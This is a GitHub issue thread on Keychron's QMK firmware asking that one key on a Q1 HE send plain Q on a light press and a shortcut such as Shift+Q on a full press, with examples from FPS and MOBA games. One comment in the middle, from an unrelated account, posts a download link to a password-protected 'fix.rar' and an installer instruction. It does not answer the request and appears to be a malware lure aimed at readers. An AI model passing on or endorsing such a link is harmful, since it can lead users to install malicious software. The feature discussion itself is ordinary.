### ISSUE TITLE
[Feature Request] One key, several commands with a keyboard shortcut

### ISSUE THREAD

**Issue by ma3uk** [Keychron/qmk_firmware#302]
### Feature Request Type

- [ ] Core functionality
- [ ] Add-on hardware support (eg. audio, RGB, OLED screen, etc.)
- [X] Alteration (enhancement/optimization) of existing feature(s)
- [X] New behavior

### Description

Dear Keychron developers, being the owner of Q1 HE, I ask you to add functionality to add a keyboard shortcut to the one key, multi command function, namely, to add the ability to add a keyboard shortcut at different levels of pressing. For example, for FPS games, the functionality will be useful that when the key is pressed weakly, the character will walk (simply pressing Q), and when the key is pressed fully, the character will run (turning on the Shift + Q key combination).
This feature will also be useful in MOBA games (Dota 2, League of Legends), where a short press would use a fast smart cast of the character's skill, and a long press would use a cast skill with a range indication, etc.

**Comment by wolone** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ma3uk** [comment]
I want to clarify. At the moment, if you set up DKS in such a way that just a key (for example, Q) is pressed at the beginning, and then add a Shift key press, then this will not be counted as a Shift + Q key combination, but as Q + Shift, and will not work in games like League of Legends, where keyboard shortcuts are used for various behaviors of using character skills (for example, Shift + Q is the use of a skill with a display of the radius of the skill and its direction, Alt + Q is the use of a skill on your character, Ctrl + Q is raising the skill level). In order for these combinations to work correctly, you need to make sure that with a weak quick press, just Q is triggered, and with a full press, Q is canceled without registering the press and the Shift + Q key combination (or another combination) is registered. 
Most likely, such functionality cannot be implemented without adding an additional delay to check the registration of a full press, but I think the delay time can also be made a configurable parameter when configuring behavior.
